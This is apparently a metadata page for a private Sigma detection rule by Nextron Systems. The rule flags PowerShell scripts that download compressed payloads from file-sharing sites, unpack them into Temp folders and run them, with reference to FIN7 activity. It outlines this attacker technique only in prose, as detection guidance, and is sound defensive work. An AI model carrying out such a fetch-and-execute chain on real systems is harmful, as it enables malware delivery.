Potentially Suspicious PowerShell Script With Decompression And Download Capabilities Executed

Rule Info

Name
Potentially Suspicious PowerShell Script With Decompression And Download Capabilities Executed
Author
Nasreddine Bencherchali (Nextron Systems)
Description
Detects the execution of a potentially suspicious PowerShell script that contains references to "Download", "Decompression" and "Execution" cmdlets along with suspicious paths and file sharing websites. Threat actors were seen leveraging PowerShell scripts that download a compressed malicious payload from a file sharing domain such as "anonfiles" or some CDN hosting platform. Then decompressing and storing the payload in an unusual location such as "Temp" directories" and then executing it everything.
Reference
https://www.esentire.com/blog/fin7-uses-trusted-brands-and-sponsored-google-ads-to-distribute-msix-payloads
Date
2024-06-06 00:00:00
Modified
None
Id
387e16a3-ed06-4ecb-9b9c-7dae0d067440
Tags
attack.defense_evasion attack.t1140
Type
Nextron Sigma feed only (private)

Rule History

THOR Logo  Scan your endpoints, forensic images or collected files with our portable scanner THOR
  Warning: Access to VALHALLA is rate-limited - once you prove unworthy, access gets denied
  Nextron Systems 2022